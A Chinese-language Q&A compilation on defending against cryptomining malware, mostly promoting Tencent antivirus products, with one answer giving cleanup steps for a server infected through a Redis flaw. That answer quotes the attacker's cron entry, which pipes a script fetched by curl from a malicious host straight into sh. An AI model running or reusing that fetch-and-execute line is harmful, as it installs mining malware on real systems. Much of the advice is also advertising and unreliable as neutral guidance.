内网挖矿防护

⑴ 拦截挖矿木马程序应该怎么做比较好

可以用腾讯电脑管家，全方位保护账号安全，精确打击木马，瞬时查杀风险。电脑诊所，针对日常电脑问题进行修复和处理，覆盖问题范围广泛，快速搜索，智能匹配，一步一轻松解决电脑问题。实时全方位保护用户电脑免受木马攻击。

⑵ 电脑上怎么能拦截挖矿木马程序

可以安装腾讯电脑管家，拦截木马程序的，推出“反挖矿防护”功能，可对此类挖矿木马进行全面拦截。拦截并预警各类挖矿木马程序和含有挖矿js脚本网页的运行。

⑶ 阿里云服务器被挖矿了怎么办(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下，感兴趣的可以研究下：

View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

⑷ 有没有什么软件可以对挖矿木马进行防御

试试腾讯电脑管家，当威胁出现时，电脑管家会闪电查杀与拦截，在完成安全动作之后又迅速安静离开，仿佛从未来过，除了安全保护之外，不做一件多余的事情。从“杀毒+管理”2合1产品形态的创新，到WestCoastLabs（西海岸）、VB100、AV-C、AV-TEST全球四大杀毒软件评测的满贯通过，腾讯电脑管家已经跻身国际一流水平，成为7亿腾讯用户最值得信赖的可靠伙伴。

⑸ 拦截挖矿木马程序用什么比较好

可以用腾讯电脑管家是杀毒加管理二合一的安全软件，全方位保障用户上网安全。首次参加AVC测评即获性能最佳评级。是中国的首款二合一反病毒软件，安全管家。占内存小，杀毒好，防护好。

⑹ 局域网内被种挖矿病毒，怎么查找病毒来源主机是哪一台

有以下几种方法：

1. 在局域网中选部分电脑部署软件防火墙，然后通过防火墙拦截记录就能发现病毒源主机。这种适合小规模局域网。

2. 使用专杀工具进行挨个主机杀毒，为防止病毒流窜，只开一台电脑进行杀毒，查杀完毕后立马关机，再开另一台进行杀毒。工作量比较大。

3. 部署企业版杀毒软件，如火绒等。如需要，我可以帮你申请三个月免费试用。当然也可以自己去官网申请。

   暂时就想到这么多，希望对你有用。
   

⑺ 同帐号的路由在一个内网里挖矿的情况吗

需要双WAN口的路由器就可以同时连接内外网。

外网网线接WAN口1，内网网线接WAN口2，电脑接LAN123任意一个。

输入路由器背面的IP地址帐号密码进入路由器，点击设置向导---下一步输入WIFI密码，下一步选择WAN口1---下一步选择PPPOE--下一步输入宽带帐号密码，保存。WAN口1的外网就通了。

⑻ 挖矿木马如何避免

可以在腾讯智慧安全页面申请使用腾讯御点
然后使用这个软件上面的修复漏洞功能
直接对电脑的漏洞进行检测和修复就可以了